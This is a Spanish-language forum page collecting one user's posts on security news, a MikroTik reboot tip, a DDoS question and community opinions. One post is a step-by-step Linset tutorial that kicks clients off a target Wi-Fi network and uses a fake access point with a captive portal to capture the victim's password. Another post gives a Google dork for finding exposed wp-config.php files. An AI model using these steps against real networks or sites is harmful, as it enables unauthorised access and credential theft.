Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Mayk0

#1
Buenos días a todos, les comparto un pequeño script básico y sencillo para programar un reinicio de cualquier equipo Mikrotik.
Esto sirve para que los equipos no se colapsen o puedan tener problemas, es recomendable reiniciar los equipos y mantenerlos actualizados.

1 - Iniciamos Winbox, dirigirse a "System->Scheduler".
2 - Click en el simbolo "+".

En la ventana Scheduler, colocar un nombre a modo de ejmplo puse "Reinicio".
Start Date, es cuando va a comenzar a ejecutarse el script.
Start Time, se coloca el horario que se va a ejecutar, en este caso a las 3AM.
Interval, es el tiempo de intervalo de ejecución, en este caso, el equipo se reinicia todos los días.
Owned, es el usuario que generó el script, en este caso va a tomar el usuario con el que logeas al momento de crear el script.
Policy, deben dejar todos los tildes marcados por defecto.
On Event, el escript es "/system reboot", sin comillas.




Nogalroot.
Hacktivismo Latinoamerica.
#2

Hola gente, tendo una complicación. Resulta que en una VPS Windows, tengo montado un server el cuál este recibe ataques de ddos constantemente (Estamos hablando de 1Tbps y a veces más...Usan stressers y demás botnets para atacar). Por lo que veo los ataques suelen hacerlo por Desbordamiento, tendría que volver a revisar que puertos tengo habiertos.. lo que sé que usan diversos ataques.


Primero en principal quiero destacar que busqué información pero la cantidad de cosas que hay son la grán mayoría de pago, como por ejemplo "Voxility" (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) que casi todos mis colegas lo usan y le es efectivo, también acompañado de un pequeño software llamado "The Guardian Anti-Ddos" que ahí pueden tener una visualización del tráfico que va corriendo y pueden crear diversas reglas o simples clicks y mitigar la ip (Este software también se puede usar en Windows).


Creo que no saber que firewall puedo meter en esa vps.
Por otro lado no sabria como ver el tráfico de la vps para poder al menos crear reglas en algún firewall y mitigarlos...

Se me ocurrió algo casero, usar otras VPS de Linux (Debian 7) que tengo para crear un proxy y que funcione de la siguiente forma:

La gente conectaría a la VPS-LINUX donde tendría IPTABLES y otro tipo de libertad para mitigar el tráfico y revisarlo, a la vez usar esa VPS como proxy, que conectaría a la VPS-WINDOWS. Entonces la de Linux limpiaría el tráfico con herramientas para mitigar los ataques y escondería realmente la IP, y pasaría el trafico a la de Windows limpio y no caería, o al menos supongo eso, pero no sé si eso se puede hacer...

Cabe destacar que abro este hilo por que realmente es importante y a la vez interesante, sobre todo creo que a varias personas esto le va a servir para mantener VPS y servicios un poco más estables.

Desde ya muchisimas gracias por leer este post y espero haberme expresado correctamente, dentro de mi ignorancia en el tema, trato de explicar y dar a conocer el problemita. Un saludo!

#3
Off Topic / Cosas que me gustaría en Underc0de.
Febrero 06, 2016, 07:43:56 PM

He sido colaborador de underc0de, formé parte del Staff y aportaba en este foro hace algunos años atrás. Por cuestiones de falta de conectividad me alejé un poco de todo, pero seguí trabajando y visitando este sitio; a lo margo del tiempo he visto que acá adentro hay gente con potencial para conformar un equipo y afrontar proyectos bastante interesantes.

Quizás no sé lo que pasa a puertas cerradas en el equipo administrativo de este foro, pero en mi opinión desde un simple visitante veo que están quedandosé atrás, me refiero a que ustedes pudieron y pueden ser más que un lugar de encuentro para compartir conocimientos.

Vale aclarar que han crecido bastante, pero pudieron crecer aún más.

Cosas que me gustaría que underc0de ponga en campaña

- Conseguir Partners nuevos y activos.
- Realizar investigaciones.
- Desarrollo y venta de Herramientas.
- Eventos y Conferencias.
- Crear franquicias o Filiales en diferentes países donde se represente Underc0de.
- Realizar más cursos con certificaciones.
- Moverse más en las redes sociales, es muy importante tener gente en Marketing y Buenos diseñadores gráficos.
- Ofrecer servicios de Pentesting y auditoría.
- Directos en Hangout o alguna pataforma para que la gente conozca quién está detrás de todo esto. Sería agradable para muchos usuarios conocerlos.


Estas son algunas de las tantas cosas que se me vienen a la cabeza que se deberían realizar en Underc0de, esta es una opinión abierta, una opinion personal constructiva. Repito, es una opinión de un usuario más que es visitante.

Ánimo muchachos, se que pueden ser mejores y crecer a pasos agigantados hablando en diversos ámbitos.

Un gran abrazo a todo el equipo que conforma esta comunidad y felicitaciones por ayudar a tanta gente!.
#4
La empresa prometió no utilizarlo para monitorear la actividad e intereses de los usuarios, salvo que esté especificado en la configuración de privacidad.


Google está produciendo routers Wi-Fi como parte de su ambición de ofrecer mejores conexiones a internet para que sea más fácil para la gente acceder a sus servicios digitales y ver más de su publicidad en línea.

La compañía con sede en Mountain View, California, lanzó su nuevo enrutador inalámbrico llamado OnHub, más elegante, más confiable, más seguro y más fácil de utilizar que otras alternativas que llevan mucho tiempo establecidas elaboradas por Arris Group, Netgear, Apple y otros especialistas en hardware.

Google se asoció con el productor de dispositivos de conexión TP-Link para construir al OnHub. OnHub también se adaptará a las necesidades cambiantes de sus propietarios ya que su software se actualizará constantemente para desbloquear nuevas herramientas, de acuerdo a Trond Wuellner, gerente de producto en Google Inc.

El concepto es similar a las actualizaciones automáticas de software que la compañía hace en su navegador Chrome y computadoras personales que corren el sistema operativo Chrome.


La expansión de Google a los enrutadores inalámbricos podría traer al presente aquella vez que la compañía transgredió las redes Wi-Fi en hogares y comercios alrededor del mundo durante más de dos años a partir de 2008. En 2010, Google reconoció que autos empresariales que tomaban fotos para sus mapas digitales también interceptaban correos, contraseñas y otra información sensible enviada a través de redes Wi-Fi sin protección.

A la intrusión se le conoció en tono burlón como "Wi-Spy". Aunque Google insistió que no infringió ninguna ley, pagó siete millones de dólares en 2013 como parte de un acuerdo por las acusaciones hechas por 38 estados y el Distrito de Columbia por espiar ilegalmente en Estados Unidos.

Ahora, Google promete no utilizar al OnHub para monitorear la actividad en internet de los usuarios. Pero sí almacenará información personal enviada a través de la conexión de internet enlazada con OnHub cuando un usuario visite un motor de búsqueda de Google u otros servicios, como YouTube o Gmail, cuando los controles de privacidad estén establecidos para permitir la recolección de información. Es decir que el usuario podrá "elegir" o no darle esa información a Google.

Google tiene un incentivo financiero para hacer al internet más accesible y menos frustrante al uso porque corre el motor de búsquedas dominante en el mundo, así como YouTube y Gmail. También espera vender más electrodomésticos y otros equipos que requieran conexión inalámbrica a internet.

Las preventas del router inalámbrico, que además no es barato ya que cuesta unos 199 dólares, pueden hacerse a partir de este martes en la tienda en línea de Google, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. El dispositivo estará a la venta en Estados Unidos y Canadá a finales de agosto o principios de septiembre.

Fuente: Lavoz
#5
Red Hat Enterprise Linux OpenStack Platform es una solución de co-ingeniería basada en los cimientos de Red Hat Enterprise Linux e integra la tecnología OpenStack de Red Hat para formar una plataforma cloud lista para producción.


Esta combinación responde a las dependencias críticas que OpenStack tiene en Linux y proporciona una plataforma escalable y tolerante a fallos para la construcción de clouds privadas o públicas. Originalmente lanzada en 2013, esta nueva versión es la quinta iteración de Red Hat de Red Hat Enterprise Linux OpenStack Platform , la cual ha sido implementada con éxito en todo el mundo por clientes en mercados verticales clave, incluyendo el sector público, financiero, telecomunicaciones y educación.

La versión 7 de RHELOSP incluye nuevas características encaminadas a acelerar la adopción de OpenStack, incluyendo:

- Despliegue y gestión simplificada – Los operadores cloud tienen ahora una manera más simple de gestionar el día a día de la operaciones y la provisión de recursos, utilizando el nuevo director de Red Hat Enterprise Linux OpenStack Platform.

- Cargas de trabajo tradicionales que requieren alta disponibilidad en OpenStack – Facilita la migración de las aplicaciones tradicionales, aplicaciones críticas para el negocio que requieren alta disponibilidad de OpenStack, Red Hat Enterprise Linux OpenStack Plataform 7 introduce el nodo host de alta disponibilidad a través de un servicio integrado, monitoreado, automatizado y de conmutación de tolerancia a fallos de Red Hat Enterprise Linux.

- Control de seguridad mejorado - Los clientes de telecomunicaciones ahora tienen una mayor granularidad y control sobre los puertos de tráfico de red a nivel de máquina virtual.

- Flexibilidad de red - Las nuevas características de redes de neutrones ofrecen una mayor flexibilidad y una mayor redundancia de red. Los operadores de red pueden beneficiarse de varias mejoras de IPv6, incluyendo la capacidad para apoyar el enrutamiento de red directa entre los gateway tenants y externos.

- Backup progresivo - Los administradores de almacenamiento pueden ahora beneficiarse de backups de almacenamiento de bloques más rápidos y reducir las necesidades de capacidad con soporte para los backups basados en instantáneas.

Integración de confianza y ecosistemas

Red Hat Enterprise Linux OpenStack Plataform es respaldado por uno de los mayores ecosistemas de OpenStack, con más de 350 partners certificados de aplicaciones y servicios OpenStack, como computación, almacenamiento, redes y proveedores de software independientes (ISV).

Radhesh Balakrishnan, director general, OpenStack, Red Hat "Hemos elevado el estándar para OpenStack listo para la producción con Red Hat Enterprise Linux Platform OpenStack 7. Con una mayor adopción de OpenStack, estamos entusiasmados de responder a las necesidades de reducción del tiempo de solución con un enfoque verdaderamente abierto que permite la implementación automatizada y la gestión del ciclo de vida de la infraestructura".

Fuente: diarioti
#6

Un ataque cibernético cuya autoría se atribuye presuntamente a 'hackers' rusos y que tuvo como objetivo el correo electrónico de los jefes del Estado Mayor Conjunto de EE.UU. ha demostrado "una verdad incómoda" sobre "el Ejército más poderoso del mundo", informó el canal CBS News.

Esta "verdad incómoda", según el reportaje de CBS News, evidencia que Estados Unidos está preparado para llevar a cabo una guerra convencional, pero no así una guerra cibernética, como refleja que las instituciones más vitales del país sean vulnerables a los posibles ataques de los piratas informáticos.

Unos 2.500 expertos civiles y militares que trabajan en el Estado Mayor Conjunto utilizaban el correo electrónico para programar sus reuniones y escribir sobre otras actividades cotidianas.

Gary Miliefsky, el director general de la empresa de seguridad SnoopWall, dijo en el mismo reportaje que Estados Unidos no está listo para la guerra cibernética. "Pero estamos muy bien preparados para la guerra convencional", destacó.

"Todo esto subraya una verdad muy incómoda sobre el Ejército de Estados Unidos, que a menudo es considerado el más poderoso del planeta", según el canal.

El año pasado hubo otros ataques que demostraron que es posible interrumpir "las actividades de las instituciones más poderosas de nuestro país", recordó el reportero.

Fuente: Actualidad.rt
#7
El documento de 15 páginas fue autoeliminado al cabo de una hora por falta de visitas.


Esto califica directamente para los más grandes trolleos de la historia. Desde 2012 con el boom de los sucesos detonados por Wikileaks, Julian Assange y Edward Snowden, se han visto distintas reacciones a lo largo del planeta sobre la ineludible invasión a nuestra privacidad que han implementado diversos gobiernos, y algunos ciudadanos al ver el escenario decidieron entrar en acción.

Ese fue el caso de Michael Scerba, según reporta The Canberra Times, un graduado del Departamento de Defensa australiano, que tuvo la idea noble y genuina de unirse a la causa, tomando algunos secretos de Estado que por azares del destino cayeron en su poder, para compartirlos en 4chan. ¿El resultado? cuatro comentarios, donde los usuarios de esta red social calificaron el contenido del documento como "falso y gay".

Bajo el título de Julian Assange es mi héroe, la entrada en 4chan habría durado en línea cerca de una hora, lapso en el que todos los usuarios tuvieron oportunidad de consultar un documento clasificado de 15 páginas, obtenido de una Agencia de Espionaje Australiana, en donde se daba cuenta de bombardeos, muertes de civiles y acciones terroristas jamás aparecidas en los medios de comunicación oficiales; el impacto de esta publicación fue tal que en menos de una hora el post fue autoeliminado del sitio, por falta de popularidad.

Seguramente había muchas fotos de LOLCats ese día.

Por desgracia, según confirma IB Times la Policía Federal de Australia fue una de las pocas personas que sí vieron la publicación, lo que desató la investigación por la que Scerba está siendo procesado judicialmente en la actualidad.

Habría bastado un rastreo de la dirección IP del sujeto para dar con su domicilio, en donce encontraron un CD con toda la información subida originalmente a 4chan. Ahora Scerba espera por una fecha para juicio, en donde enfrenta cargos por poner en riesgo la seguridad nacional de su país.

Muy bien, usuarios de 4chan, hicieron que valiera la pena...

Fuente: fayerwayer
#8

Algo más de una semana ha pasado, y en este tiempo los problemas para Windows 10 han sido varios. El "error crítico" del menú de Inicio y Cortana, herencia de las Technical Preview, parece haber sido solucionado con el parche más reciente. Sin embargo, sigue habiendo problemas para los que tratan de actualizar gratis desde Windows 7 y Windows 8. No son todos los usuarios, evidentemente, pero algunos están viendo cómo su ordenador queda KO en el proceso de instalación.

Usuarios que no han recibido posibilidad de actualizar gratis a Windows 10 aún cumpliendo las condiciones y otros que, una vez recibida la alerta e iniciada la instalación, están encontrando problemas en el proceso. Microsoft ha reconocido el problema, y la única solución que están ofreciendo a los usuarios, vía telefónica, es ponerse en contacto con el equipo de Microsoft para brindarles asistencia remota. Y es que el mayor problema es que, una vez dado el problema con el arranque del sistema, la solución pasa por utilizar un disco o unidad de arranque.

El problema, por otra parte, no se sabe a ciencia cierta por qué se está produciendo, si hay un patrón concreto que resulte en este contratiempo. No obstante, lo que sí es cierto es que la mayoría de los ordenadores que están registrando estos problemas son del fabricante ASUS, y concretamente ordenadores portátiles con unidades de estado sólido. De todas formas, como adelantábamos, este punto no es fiable al cien por cien, sino sólo un dato que ya se ha podido apreciar.

Hay algunos problemas de incompatibilidad en Windows 10


Según las declaraciones oficiales de Microsoft, desde la compañía de Redmond se reconoce públicamente el problema y, concretamente, han manifestado que "aunque la mayoría de los usuarios podrán actualizar a Windows 10 sin encontrar problemas, hay algunos posibles problemas con aplicaciones y programas que se irán reduciendo con el tiempo". Por lo tanto, como ya sabíamos anteriormente, hay algunas piezas de software que pueden ocasionar problemas, algo que por otra parte solucionaríamos haciendo una instalación limpia.

Fuente: adslzone
#9
Descubren que el Hacking Team usaba Apps de Facebook y WhatsApp para robar información:
El robo de información sucedía luego de engañar a los usuarios a instalar una aplicación modificada de diferentes aplicaciones más descargadas de la App Store.



A un mes del hackeo a la compañía italiana Hacking Team, continúan develándose nuevas técnicas que utilizaban para extraer información confidencial, esta vez de disposivos móviles iPhone.

El equipo informático habría utilizado las aplicaciones de Facebook, WhatsApp, Viber, Google Chrome, Telegram y Skype para robar información de los usuarios. Hacking Team alteraba las aplicaciones oficiales de manera que sirvieran como distracción mientras se producía el robo de información en segundo plano.

Según explica The Next Web, las apps modificadas eran capaces de obtener el historial de navegación en Chrome, Fotos dentro del dispositivo, SMS e interceptar llamadas en Skype, WhatsApp, Facebook Messenger y Wechat, entre otras.

El descubrimiento realizado por FireEye también develó que, aún cuando Apple implementó un parche en iOS 8.1.3 que supuestamente solucionaba este método de hackeo, Hacking Team igualmente encontró la manera de seguir utilizando el mismo método al engañar a los usuarios a que instalaran las aplicaciones modificadas fuera de la App Store.

El ataque no requería que los dispositivos tuvieran jailbreak, ya que las aplicaciones podían entrar a los iPhone de manera simple al entrar a un vínculo de instalación que podía llegar a tu correo electrónico, por lo que la única complicación era la suspicacia del usuario.

Fuente: wayerless
#10
HACKERS DESCUBREN VULNERABILIDADES EN EL TESLA MODEL S Y AYUDAN A LA MARCA A REPARARLAS

A través de un conector, los expertos pudieron implantar un troyano que les permitía controlar el auto de forma remota.


Hace casi un mes dos hackers lograron controlar un Jeep Cherokee de forma remota, encendiendo las alarmas sobre la seguridad de los software en automóviles que están cada vez más conectados. Esto provocó que inmediatamente la marca estadounidense realizara la actualización de los sistemas de sus modelos, señala Carscoops.

Recientemente, otra dupla de hackers, Kevin Mahaffey y Marc Royers, detectó 6 vulnerabilidades en el Model S de Tesla Motors. El primer problema sería un conector que se encuentra detrás del tablero en la zona del conductor, este conector permite conducir el auto desde un computador usando los comandos del software.

Al poder conectar un portátil a este conector, se puede implantar un troyano posibilitando el acceso remoto y toma de control del Model S. Los hackers también descubrieron que el navegador del sistema de infoentretenimiento está obsoleto (WebKit de Apple), puesto que sería de hace cuatro años.

Estas vulnerabilidades fueron informadas a la compañía de Elon Musk, quienes distribuirán una actualización el próximo miércoles.

Fuente: bolido
#11
Agosto está siendo un mes muy movido en cuanto a los problemas de seguridad informática y si hace poco os contábamos que los dispositivos móviles estaban en riesgo por culpa de la vulnerabilidad crítica Starefright, ahora le ha tocado el turno al navegador Mozilla Firefox que ha pedido a sus usuarios que actualicen su versión para evitar ser expuestos al riesgo de robo de datos personales.

Mozilla Firefox ha descubierto un exploit que aprovecha una brecha de seguridad en el lector PDF Viewer del navegador. A través de esta herramienta un atacante podría buscar archivos clave entre los almacenados en el equipo según ha hecho saber el analista de seguridad Cody Crews y Mozilla no ha querido esperar para solucionar el problema. La versión 39.0.3 del popular navegador de Internet ya incluye el parche para subsanar el fallo, por lo que se recomienda a los usuarios que actualicen a esta versión para evitar posibles problemas.

Además, a través de los canales oficiales se ha informado que esta vulnerabilidad no afecta a aquellas versiones del software que no incluyan el PDF Viewer peor afectaba tanto a sistemas Windows como a Linux, mientras que por el momento no se ha extendido a los sistemas Mac aunque Daniel Veditz, responsable de seguridad de Mozilla no descarta que se pueda dar en cualquier momento.


Los archivos personales robados son subidos a Internet
Otra de las características más llamativas de este exploit es que los archivos eran subidos sin que el usuario lo detectara a un servidor en Ucrania y además no dejaba ninguna pista de haber infectado el equipo de la víctima. Desde Mozilla han querido comunicar unas directrices claras a los usuarios para que puedan protegerse, que pasan en primer lugar por actualizar la versión del navegador.

Pero para evitar correr riesgos innecesarios, se ha pedido a los usuarios que cambien las contraseñas y claves almacenados por Mozilla Firefox ya que podrían abrir las puertas de numerosos servicios online a los ciberdelincuentes. La última actualización de Mozilla ya incluía la solución a más de una decena de vulnerabilidades detectadas en el navegador Mozilla Firefox que vuelve a posicionarse como uno de los blancos preferidos por los hackers para lanzar ataques con el objetivo de conseguir acceso a información privada y sensible.

Fuente: adslzone
#12
The dork 'inurl:wp-admin/admin-ajax.php inurl:wp-config.php' finds the
'wp-config.php' file. It contains information about the database,
including the name, host (typically localhost), username, and password.
This information allows WordPress to communicate with the database to store
and retrieve data (e.g. Posts, Users, Settings, etc).

Google Dork: inurl:wp-admin/admin-ajax.php inurl:wp-config.php


Name: Suyog Pawar.
Submited: 2015-07-27
#13

TEMA YA MUY PERO MUY REPETITIVO, PERO GENTE AÚN NO SABE COMO USAR NI COMO FUNCIONA LINSET.

Bueno, antes de nada, presentar la herramienta. Para los que no la sepan, es una herramienta de ingeniería social, basada en el MITM para comprobar la seguridad (o ignorancia) de los clientes de nuestra red. Hay varias versiones pero casi todas cumplen las mismas funciones, solo se van agregando algunas mejoras.
La herramienta tiene capasidad para:

1. Escanea la red.
2. Selecciona la red.
3. Busca handshake (se puede usar sin handshake)
4. Se elige una de las varias interfaces web adaptadas por mi (gracias a la colaboración de los users)
5. Se monta un FakeAP imitando al original
6. Se crea un servidor DHCP sobre el FakeAP
7. Se crea un servidor DNS para redirigir todas las peticiones al Host
8. Se lanza el servidor web con la interface seleccionada
9. Se lanza el mecanismo para comprobar la validez de las contraseñas que se van a introducir
10. Se desautentifica a todos los usarios de la red, esperando que se conecten al FakeAP e introduzcan la contraseña.
11. Se detiene el ataque tras la comprobación correcta de la contraseña

Para probar su funcionamiento, es necesario que tengais instaladas diversas dependencias, las cuales LINSET comprobará y indicará si están instaladas o no.

Acá les dejo las diferentes versiones que hay de Linset y sus diferntes caracteristicas!
Versiones de Linset

Bueno, voy a empezar la explicacion!

Linset trabaja de la siguiente manera lo voy a explicar lo mas sensillo que pueda: Linset basicamente usa Ingenieria social. Linset ataca a un Router donde se alojen clientes conectados, haciendo que se desautentifiquen y no puedan conectar más. Mientras el ataque se ejecuta, Linset automaticamente crea una red paralela falsa con el mismo nombre. De esta forma la victima le aparece que se callo el internet, cuando van a verificar se conectan a su red supuestamente (pero en realidad es la red falsa) y cuando intenten abrir el navegador les aparecerá un mensaje que introduzca la contraseña, la persona cuando pone el password le llega la informacion ala atacante y la red falsa desaparece totalmente. Y luego la victima navega como si nada, espero se entienda ahora mientras voy mostrandoló voy a ir explicando detalladamente.

Otra cosa muy importante: Tengan en cuenta que si estan usando Wifislax, deben fijarse si su antena tiene un chipset compatible con la version del sistema. Se van a topar con el problema que en algunos casos no les tomará la antena.

Pueden instalar Linset en otra distribución pero les va a pedir el requisito de tener todas las herramientas con el cual funciona Linset. Abajo un pantallazo de cuando Linset inicia y las herramientas que carga para su uso.




1 -  Lo primero que debemos hacer es abrir porsupuesto la herramienta, nos va aparecer algo así. En mi caso yo uso una antena TP-LINK conectada por USB. Si no aparece Wlan0 es porque tiene problemas de compatibilidad.


Seleccionamos la interfaz: 1 (En mi caso corresponde a mi tarjeta TP-LINK)
Seleccionamos el canal: 1 (Escanear todo)


Acá muestra la redes capturadas, obviamente elegimos la que queremos atacar, en el caso que una tenga el * significa que hay clientes conectados a esa red, lo que buscamos es eso, gente que este conectada a la red para poder desautentificarlos!.


Método de verificación de pass: 1 Handshake(Recomendado)
Tipo de comprobación del handshake: 1 Estricto
Capturar handshake del cliente: 1 Realizar desaut. masiva al AP objetivo


Acá esta desautentificando clientes en la consola de la derecha.

Una vez conseguido el "WPA Handshake" Frenamos el ataque y Linset nos preguntará si logramos ejectuar el hash y le damos que si. En caso de que no lo alla ejecutado le damos a la opcion numero 2 y lanzamos nuevamente el ataque hasta obtener el dicho hash. Sigamos...


Selecciona la interface web: 1 Interfaz web neutra.
Selecciona idioma: 2 Spanish

En este momento Linset está configurando la interfaz web que le va aparecer al usuario, obviamente le damos en "Spanish [ESP]".

Sigamos...


Acá se pone bueno.. Voy a explicar que es cada ventana:

- En la Terminal de la izquierda (Verde) Está practicamente mandando la interfaz web a nuestra victima para que introduzca el password.

- La segunda ventana de la derecha en la parte superior, espera la clave mientras nos muestra un pantallazo de informacion basica, tiempo de espera, nombre, mac address, etc.

- La tercera página en la parte inferior izquierda, nos muestra las diferentes páginas webs que la victima quiere ingresar que van a ir siendo bloqueadas hasta que el usuario ingrese el password.

- La ultima ventana roja, nos muestra al ataque que va haciendo desautentificando los clientes de el modem o router, es importante que el ataque no se detenga porque lo que está haciendo es que no deje que los clientes se conecten.

Mientras la victima conecta a la red falsa, y el ataque se va efectuando, por instinto la persona va a querer navegar y cada web que abra le aparecerá lo suguiente:


Entonces cada página que abra le aparecerá el cartel, hasta que la victima no ingrese la contraseña de su red, no podrá navegar!. En caso de que ponga cualquier password que no sea el correcto le aparecerá un mensaje diciendo "Que el password es incorrecto". Si la persona puso la verdadera contraseña le aparecerá "La conexion se reestablecerá en breve" y entonces nos llega el password a nuestra terminal.


Ahora comprenden que se trata de ingenieria social...

Un último punto que quiero aclararles porque me pasó, Cando van a hacer este tipo de ataques es necesario estar un poco cerca de el router que estas por atacar, porque? Porque acuerdensé que estan creando una red falsa y necesita tener potencia para que le figure a la vicitma, entonces si esta muy lejos a lo mejor no le aparece. Les recomiendo tener una buena antena conectada por USB, las internas mucho alcance no tienen.

Espero que les sirva esto, y que me entiendan. Suelo hacer los temas muy largos pero trato de explicarlo lo mejor que pueda a diferencia de otros post donde solo publican lo básico! Un saludo Atte: Mayk0!

Facebook: Hacktivismo Latinoamerica
#14
- A veces me siento a leer y responder tantas preguntas y demás en mi fan page y en otros lados donde tengo gente aprendiendo, comparto muchas historias y suelo leer gente diciendo cosas sin sentido, compartiendo tarjetas de creditos, haciendo o intentando ser estafadores... Mucha basura en internet..

Me pregunto si algún día van a volver esas personas de la vieja escuela a moldear todos nuevamente, creo que sería imposible.

Siento que se perdieron muchos valores de como era todo antes, hablo de que ya no se comparte buena información, ya no se puede conversar con la gente y establecer una charla, los chicos queriendo solamente dinero y dinero. Ya no se toman el tiempo de leer libros, pasar horas probando y testeando, viendo como todo funciona. Ahora todo es automático, nadie quiere perder tiempo.

Suele venir gente a preguntarme por donde comenzar en esto, dedíco tiempo a gente que le interesa aprender desde 0. También vienen a preguntarme como hacer Carding, hay gente para todo hoy en día... Suelo "perder tiempo" como dicen algunos enseñandolés lo poco que yo se a esas personas que quieren leerme o escucharme, tratando de que sean buenos, no que aprendan mierdas. Les doy libros, les enseño historia y me pregunto... el día que aprendan más, serán como todos los idiotas que andan haciendosé los pro?...

- Me llena de mucho orgullo que la gente me agradezca por lo que enseño, más allá que sean creditos de otras personas, hay algo que otros no hacen... es tomar esa información explicarla correctamente y hacer un debate para experimentar más cosas, sacar más ideas y hacer algo en base a esa información...


Creo que en este foro, hay gente vieja con valores como los de antes, un saludo a todos ellos. Esta es mi humilde y breve expresión de enojo y de no saber entender como es la gente hoy en día.
#15
El jueves la Asamblea aprobará la Ley de Delitos Informáticos que contiene sanciones de tres hasta doce años de prisión contra piratas, difamadores y proxenetas que ocupan la red para delinquir



Hackear bases de datos privadas y del Gobierno, dañar páginas en la red, violar sistemas de seguridad, estafa a través de computadora, espiar las comunicaciones, clonar tarjetas, robar la identidad de un usuario, divulgar información privada, difamar, acosar sexualmente y mostrar contenidos pornográficos a menores de edad y a discapacitados mentales a través de las redes sociales serán considerados delitos si el próximo jueves el pleno de la Asamblea Legislativa aprueba la Ley de Delitos Informáticos.

El martes la comisión de Seguridad del Legislativo avaló la ley que contiene 37 artículos. La propuso el 11 de junio de 2010 el entonces diputado Douglas Avilés, de Cambio Democrático (CD).

La normativa establece 25 delitos: prestación de servicios, violación a la seguridad, estafa, fraude, espionaje, hurto, manipulación, obtención indebida de bienes, alteración, daño a la integridad, interferencia, divulgación no autorizada, difusión de información perjudicial, uso de datos personales, divulgación de información personal, revelación indebida de datos, ofrecimiento y muestra de pornografía a niños y discapacitados mentales hechos a través de soportes informáticos. Las penas por esas infracciones oscilan de uno hasta doce años de cárcel.

El artículo 26, por ejemplo, orden castigar con un mínimo de tres y máximo de cinco años de prisión a quiénes sin consentimiento del dueño divulguen información personal sea en imágenes, vídeos, audios o textos; cuando existiere ánimo de lucro la condena oscilará entre cuatro a ocho años en la cárcel.

En el 24 establece la "información perjudicial", es decir, que todo lo que dañe la dignidad, el honor y la integridad física y moral de las personas puede ser causa para ser condenado a entre tres a cinco años de cárcel. Desde 2008 a día de hoy en blogs, Twitter, Facebook, YouTube y otras redes sociales es común que usuarios anónimos divulguen información confidencial y atribuyan conductas delictivas a figuras de los mundos político y empresarial.

La Ley establece en los artículos 11, 12, y 15 como causal de prisión el espionaje, hurto y la manipulación informática. El primero se refiere a la obtención indebida de "datos o información"; el segundo al apoderamiento de "bienes o valores tangibles o intangibles de carácter patrimonial o personal"; el tercero, a la creación, captura, copia, alteración, clonación o eliminación de contenidos en una tarjeta inteligente o en cualquier instrumento.

"Buscamos regular los delitos que no están en el Código Penal y que el uso de internet nos deja expuestos", explicó Misael Mejía, diputado del FMLN.

Los diputados también incluyeron como infracciones  la entrega de material, uso en la realización de contenidos y obtención para mostrarlo a niños, adolescentes y discapacitados mentales de material pornográfico y de contenido de violencia. Las empresas que se dediquen a esas industrias deben advertir lo que divulgan y restringir el acceso.

Desde mediados de 2014 sitios en la red con supuesto contenido informativo se han dedicado a divulgar escenas de muertes violentas y de enfrentamientos entre pandilleros y miembros de la Policía Nacional Civil (PNC).

"Va a sancionar, puede que los jueces no la empleen adecuadamente", respondió Antonio Almendáriz, diputado del PCN, cuando se le preguntó si consideraba que la ley frenará la impunidad en el ciberespacio.

Fuente: Diario1
#16
La empresa anuncia Red Hat Access Insights, servicio orientado a acelerar la analítica, gestión y operaciones para Cloud privadas, públicas e híbridas.


Red Hat ha anunciado nuevas investigaciones e innovaciones de gestión para ayudar a los clientes a optimizar sus despliegues on premise y en la nube. Entre estas innovaciones figura Red Hat Access Insights, un servicio diseñado para ayudar a los clientes de forma proactiva a prevenir y resolver los problemas que afectan a las operaciones de negocio críticas.

En su el marco del Red Hat Summit, que concluye hoy, Marco Bill-Peter, vice president, customer experience and engagement, presentó el 25 de junio Red Hat Access Insights, declarando que "Nuestro objetivo en Red Hat es proporcionar a los clientes soluciones para ayudarles a alcanzar sus objetivos de negocio. Red Hat Insight Access proporciona acceso directo a asesorías a la medida, permitiendo a los clientes cambiar su enfoque reactivo, de 'apagar incendios', a una gestión proactiva de sistemas informáticos. En la medida que evolucionan las infraestructuras de TI, los clientes de Red Hat pueden implementar nuevas tecnologías con confianza, sabiendo que sus implementaciones están siendo analizadas y validadas por Red Hat".

En su sitio, la empresa informa que Red Hat Insight Access es un servicio diseñado para asistir a los clientes para prevenir y resolver proactivamente los problemas que afectan sus operaciones de negocio críticas. Esta nueva característica proporciona a los gerentes de TI y administradores de sistemas una mayor visibilidad de su infraestructura Red Hat, y se centra en cuatro áreas críticas: rendimiento, disponibilidad, estabilidad y seguridad.

La empresa informa que el software puede alertar a los administradores de posibles problemas, tales como dificultades de configuración o vulnerabilidades de seguridad, dentro de cada una de esas áreas, por lo que los administradores pueden utilizar el panel de control de Red Hat Insight Access para identificar, comprender y corregir problemas, junto con interceptar dificultades, antes que estas tengan cualquier impacto en el negocio.

Según la empresa, Red Hat Insight Access proporciona inteligencia procesable para gestionar y optimizar la infraestructura a través de implementaciones físicas, virtuales y en la nube, habilitándoles a identificar y resolver problemas técnicos existentes y potenciales.

Por ahora, Red Hat Insights Access esta disponible mediante un programa de adopción temprana, ofrecido en el portal de usuarios o en Red Hat Satellite.

Fuente: diarioti
#17

Los ciberdelincuentes siguen buscando nuevas formas de hacer negocio y para ello tienen que intentar ir un paso por delante de las soluciones de seguridad más avanzadas del momento, algo que han conseguido con Tinba, un troyano que es capaz de actualizarse a sí mismo.

Con esa medida consigue complicar a las soluciones antimalware su detección, de forma que puede seguir haciendo de las suyas en el equipo afectado.

Para facilitar la infección se utiliza publicidad en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que sirve de disfraz a enlaces maliciosos que contienen el kit exploit HanJuan EK, que aprovecha vulnerabilidades zero day presentes en Flash Player e Internet Explorer para introducir el troyano.

Una vez dentro Tinba busca robar las credenciales del usuario y cualquier tipo de información sensible, como contraseñas, actuando como "hombre en el medio" e interceptando todas las comunicaciones que entran y salen del equipo.

Fobber, nombre que han dado al código binario que se ejecuta cuando el malware ataca al equipo del usuario, se autoactualiza para que sea mucho más difícil para las soluciones de seguridad detectar esta amenaza.

De momento no han detectado que este malware haya sido capaz de robar información bancaria, pero desde MalwareBytes, la firma que la ha descubierto, avisan que dada la flexibilidad que presenta no pueden descartarlo por completo.

Más información: DvHardware.
#18

El buscador DuckDuckGo, ha mantenido un crecimiento exponencial en los últimos años, gracias a la preocupación de la gente en la privacidad de sus datos.

